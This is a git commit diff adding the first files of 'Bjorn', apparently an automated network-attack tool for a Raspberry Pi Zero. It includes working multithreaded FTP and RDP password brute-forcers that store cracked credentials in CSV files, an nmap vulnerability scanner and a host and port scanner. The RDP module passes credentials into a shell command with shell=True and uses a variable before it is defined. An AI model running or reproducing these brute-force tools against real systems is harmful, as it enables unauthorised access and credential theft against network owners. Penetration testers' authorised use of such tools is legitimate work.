First Bjorn Commit !

This commit is contained in:
Fabien POLLY
2024-11-07 16:39:14 +01:00
parent 10ffdfa103
commit 5724ce6bb6
232 changed files with 12441 additions and 385 deletions

20
actions/IDLE.py Normal file
View File

@@ -0,0 +1,20 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
console = Console()
class IDLE:
def __init__(self, shared_data):
self.shared_data = shared_data

0
actions/__init__.py Normal file
View File

190
actions/ftp_connector.py Normal file
View File

@@ -0,0 +1,190 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

34
actions/log_standalone.py Normal file
View File

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -0,0 +1,188 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
import os
import pandas as pd
import subprocess
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_port = None
b_parent = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
return combined_result if success else None
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
else:
capture = False
return "; ".join(vulnerabilities)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")

198
actions/rdp_connector.py Normal file
View File

@@ -0,0 +1,198 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

589
actions/scanning.py Normal file
View File

@@ -0,0 +1,589 @@
#scanning.py
# This script performs a network scan to identify live hosts, their MAC addresses, and open ports.
# The results are saved to CSV files and displayed using Rich for enhanced visualization.
import os
import threading
import csv
import pandas as pd
import socket
import netifaces
import time
import glob
import logging
from datetime import datetime
from rich.console import Console
from rich.table import Table
from rich.text import Text
from rich.progress import Progress
from getmac import get_mac_address as gma
from shared import SharedData
from logger import Logger
import ipaddress
import nmap
logger = Logger(name="scanning.py", level=logging.DEBUG)
b_class = "NetworkScanner"
b_module = "scanning"
b_status = "network_scanner"
b_port = None
b_parent = None
b_priority = 1
class NetworkScanner:
"""
This class handles the entire network scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.logger = logger
self.displaying_csv = shared_data.displaying_csv
self.blacklistcheck = shared_data.blacklistcheck
self.mac_scan_blacklist = shared_data.mac_scan_blacklist
self.ip_scan_blacklist = shared_data.ip_scan_blacklist
self.console = Console()
self.lock = threading.Lock()
self.currentdir = shared_data.currentdir
self.semaphore = threading.Semaphore(200) # Limit the number of active threads to 20
self.nm = nmap.PortScanner() # Initialize nmap.PortScanner()
self.running = False
def check_if_csv_scan_file_exists(self, csv_scan_file, csv_result_file, netkbfile):
"""
Checks and prepares the necessary CSV files for the scan.
"""
with self.lock:
try:
if not os.path.exists(os.path.dirname(csv_scan_file)):
os.makedirs(os.path.dirname(csv_scan_file))
if not os.path.exists(os.path.dirname(netkbfile)):
os.makedirs(os.path.dirname(netkbfile))
if os.path.exists(csv_scan_file):
os.remove(csv_scan_file)
if os.path.exists(csv_result_file):
os.remove(csv_result_file)
if not os.path.exists(netkbfile):
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['MAC Address', 'IPs', 'Hostnames', 'Alive', 'Ports'])
except Exception as e:
self.logger.error(f"Error in check_if_csv_scan_file_exists: {e}")
def get_current_timestamp(self):
"""
Returns the current timestamp in a specific format.
"""
return datetime.now().strftime("%Y%m%d_%H%M%S")
def ip_key(self, ip):
"""
Converts an IP address to a tuple of integers for sorting.
"""
if ip == "STANDALONE":
return (0, 0, 0, 0)
try:
return tuple(map(int, ip.split('.')))
except ValueError as e:
self.logger.error(f"Error in ip_key: {e}")
return (0, 0, 0, 0)
def sort_and_write_csv(self, csv_scan_file):
"""
Sorts the CSV file based on IP addresses and writes the sorted content back to the file.
"""
with self.lock:
try:
with open(csv_scan_file, 'r') as file:
lines = file.readlines()
sorted_lines = [lines[0]] + sorted(lines[1:], key=lambda x: self.ip_key(x.split(',')[0]))
with open(csv_scan_file, 'w') as file:
file.writelines(sorted_lines)
except Exception as e:
self.logger.error(f"Error in sort_and_write_csv: {e}")
class GetIpFromCsv:
"""
Helper class to retrieve IP addresses, hostnames, and MAC addresses from a CSV file.
"""
def __init__(self, outer_instance, csv_scan_file):
self.outer_instance = outer_instance
self.csv_scan_file = csv_scan_file
self.ip_list = []
self.hostname_list = []
self.mac_list = []
self.get_ip_from_csv()
def get_ip_from_csv(self):
"""
Reads IP addresses, hostnames, and MAC addresses from the CSV file.
"""
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'r') as csv_scan_file:
csv_reader = csv.reader(csv_scan_file)
next(csv_reader)
for row in csv_reader:
if row[0] == "STANDALONE" or row[1] == "STANDALONE" or row[2] == "STANDALONE":
continue
if not self.outer_instance.blacklistcheck or (row[2] not in self.outer_instance.mac_scan_blacklist and row[0] not in self.outer_instance.ip_scan_blacklist):
self.ip_list.append(row[0])
self.hostname_list.append(row[1])
self.mac_list.append(row[2])
except Exception as e:
self.outer_instance.logger.error(f"Error in get_ip_from_csv: {e}")
def update_netkb(self, netkbfile, netkb_data, alive_macs):
"""
Updates the net knowledge base (netkb) file with the scan results.
"""
with self.lock:
try:
netkb_entries = {}
existing_action_columns = []
# Read existing CSV file
if os.path.exists(netkbfile):
with open(netkbfile, 'r') as file:
reader = csv.DictReader(file)
existing_headers = reader.fieldnames
existing_action_columns = [header for header in existing_headers if header not in ["MAC Address", "IPs", "Hostnames", "Alive", "Ports"]]
for row in reader:
mac = row["MAC Address"]
ips = row["IPs"].split(';')
hostnames = row["Hostnames"].split(';')
alive = row["Alive"]
ports = row["Ports"].split(';')
netkb_entries[mac] = {
'IPs': set(ips) if ips[0] else set(),
'Hostnames': set(hostnames) if hostnames[0] else set(),
'Alive': alive,
'Ports': set(ports) if ports[0] else set()
}
for action in existing_action_columns:
netkb_entries[mac][action] = row.get(action, "")
ip_to_mac = {} # Dictionary to track IP to MAC associations
for data in netkb_data:
mac, ip, hostname, ports = data
if not mac or mac == "STANDALONE" or ip == "STANDALONE" or hostname == "STANDALONE":
continue
# Check if MAC address is "00:00:00:00:00:00"
if mac == "00:00:00:00:00:00":
continue
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
# Check if IP is already associated with a different MAC
if ip in ip_to_mac and ip_to_mac[ip] != mac:
# Mark the old MAC as not alive
old_mac = ip_to_mac[ip]
if old_mac in netkb_entries:
netkb_entries[old_mac]['Alive'] = '0'
# Update or create entry for the new MAC
ip_to_mac[ip] = mac
if mac in netkb_entries:
netkb_entries[mac]['IPs'].add(ip)
netkb_entries[mac]['Hostnames'].add(hostname)
netkb_entries[mac]['Alive'] = '1'
netkb_entries[mac]['Ports'].update(map(str, ports))
else:
netkb_entries[mac] = {
'IPs': {ip},
'Hostnames': {hostname},
'Alive': '1',
'Ports': set(map(str, ports))
}
for action in existing_action_columns:
netkb_entries[mac][action] = ""
# Update all existing entries to mark missing hosts as not alive
for mac in netkb_entries:
if mac not in alive_macs:
netkb_entries[mac]['Alive'] = '0'
# Remove entries with multiple IP addresses for a single MAC address
netkb_entries = {mac: data for mac, data in netkb_entries.items() if len(data['IPs']) == 1}
sorted_netkb_entries = sorted(netkb_entries.items(), key=lambda x: self.ip_key(sorted(x[1]['IPs'])[0]))
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(existing_headers) # Use existing headers
for mac, data in sorted_netkb_entries:
row = [
mac,
';'.join(sorted(data['IPs'], key=self.ip_key)),
';'.join(sorted(data['Hostnames'])),
data['Alive'],
';'.join(sorted(data['Ports'], key=int))
]
row.extend(data.get(action, "") for action in existing_action_columns)
writer.writerow(row)
except Exception as e:
self.logger.error(f"Error in update_netkb: {e}")
def display_csv(self, file_path):
"""
Displays the contents of the specified CSV file using Rich for enhanced visualization.
"""
with self.lock:
try:
table = Table(title=f"Contents of {file_path}", show_lines=True)
with open(file_path, 'r') as file:
reader = csv.reader(file)
headers = next(reader)
for header in headers:
table.add_column(header, style="cyan", no_wrap=True)
for row in reader:
formatted_row = [Text(cell, style="green bold") if cell else Text("", style="on red") for cell in row]
table.add_row(*formatted_row)
self.console.print(table)
except Exception as e:
self.logger.error(f"Error in display_csv: {e}")
def get_network(self):
"""
Retrieves the network information including the default gateway and subnet.
"""
try:
gws = netifaces.gateways()
default_gateway = gws['default'][netifaces.AF_INET][1]
iface = netifaces.ifaddresses(default_gateway)[netifaces.AF_INET][0]
ip_address = iface['addr']
netmask = iface['netmask']
cidr = sum([bin(int(x)).count('1') for x in netmask.split('.')])
network = ipaddress.IPv4Network(f"{ip_address}/{cidr}", strict=False)
self.logger.info(f"Network: {network}")
return network
except Exception as e:
self.logger.error(f"Error in get_network: {e}")
def get_mac_address(self, ip, hostname):
"""
Retrieves the MAC address for the given IP address and hostname.
"""
try:
mac = None
retries = 5
while not mac and retries > 0:
mac = gma(ip=ip)
if not mac:
time.sleep(2) # Attendre 2 secondes avant de réessayer
retries -= 1
if not mac:
mac = f"{ip}_{hostname}" if hostname else f"{ip}_NoHostname"
return mac
except Exception as e:
self.logger.error(f"Error in get_mac_address: {e}")
return None
class PortScanner:
"""
Helper class to perform port scanning on a target IP.
"""
def __init__(self, outer_instance, target, open_ports, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.target = target
self.open_ports = open_ports
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
def scan(self, port):
"""
Scans a specific port on the target IP.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
con = s.connect((self.target, port))
self.open_ports[self.target].append(port)
con.close()
except:
pass
finally:
s.close() # Ensure the socket is closed
def start(self):
"""
Starts the port scanning process for the specified range and extra ports.
"""
try:
for port in range(self.portstart, self.portend):
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
for port in self.extra_ports:
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
except Exception as e:
self.logger.info(f"Maximum threads defined in the semaphore reached: {e}")
def scan_with_semaphore(self, port):
"""
Scans a port using a semaphore to limit concurrent threads.
"""
with self.outer_instance.semaphore:
self.scan(port)
class ScanPorts:
"""
Helper class to manage the overall port scanning process for a network.
"""
def __init__(self, outer_instance, network, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.progress = 0
self.network = network
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
self.currentdir = outer_instance.currentdir
self.scan_results_dir = outer_instance.shared_data.scan_results_dir
self.timestamp = outer_instance.get_current_timestamp()
self.csv_scan_file = os.path.join(self.scan_results_dir, f'scan_{network.network_address}_{self.timestamp}.csv')
self.csv_result_file = os.path.join(self.scan_results_dir, f'result_{network.network_address}_{self.timestamp}.csv')
self.netkbfile = outer_instance.shared_data.netkbfile
self.ip_data = None
self.open_ports = {}
self.all_ports = []
self.ip_hostname_list = []
def scan_network_and_write_to_csv(self):
"""
Scans the network and writes the results to a CSV file.
"""
self.outer_instance.check_if_csv_scan_file_exists(self.csv_scan_file, self.csv_result_file, self.netkbfile)
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(['IP', 'Hostname', 'MAC Address'])
except Exception as e:
self.outer_instance.logger.error(f"Error in scan_network_and_write_to_csv (initial write): {e}")
# Use nmap to scan for live hosts
self.outer_instance.nm.scan(hosts=str(self.network), arguments='-sn')
for host in self.outer_instance.nm.all_hosts():
t = threading.Thread(target=self.scan_host, args=(host,))
t.start()
time.sleep(5)
self.outer_instance.sort_and_write_csv(self.csv_scan_file)
def scan_host(self, ip):
"""
Scans a specific host to check if it is alive and retrieves its hostname and MAC address.
"""
if self.outer_instance.blacklistcheck and ip in self.outer_instance.ip_scan_blacklist:
return
try:
hostname = self.outer_instance.nm[ip].hostname() if self.outer_instance.nm[ip].hostname() else ''
mac = self.outer_instance.get_mac_address(ip, hostname)
if not self.outer_instance.blacklistcheck or mac not in self.outer_instance.mac_scan_blacklist:
with self.outer_instance.lock:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow([ip, hostname, mac])
self.ip_hostname_list.append((ip, hostname, mac))
except Exception as e:
self.outer_instance.logger.error(f"Error getting MAC address or writing to file for IP {ip}: {e}")
self.progress += 1
time.sleep(0.1) # Adding a small delay to avoid overwhelming the network
def get_progress(self):
"""
Returns the progress of the scanning process.
"""
return (self.progress / self.total_ips) * 100
def start(self):
"""
Starts the network and port scanning process.
"""
self.scan_network_and_write_to_csv()
time.sleep(7)
self.ip_data = self.outer_instance.GetIpFromCsv(self.outer_instance, self.csv_scan_file)
self.open_ports = {ip: [] for ip in self.ip_data.ip_list}
with Progress() as progress:
task = progress.add_task("[cyan]Scanning IPs...", total=len(self.ip_data.ip_list))
for ip in self.ip_data.ip_list:
progress.update(task, advance=1)
port_scanner = self.outer_instance.PortScanner(self.outer_instance, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
port_scanner.start()
self.all_ports = sorted(list(set(port for ports in self.open_ports.values() for port in ports)))
alive_ips = set(self.ip_data.ip_list)
return self.ip_data, self.open_ports, self.all_ports, self.csv_result_file, self.netkbfile, alive_ips
class LiveStatusUpdater:
"""
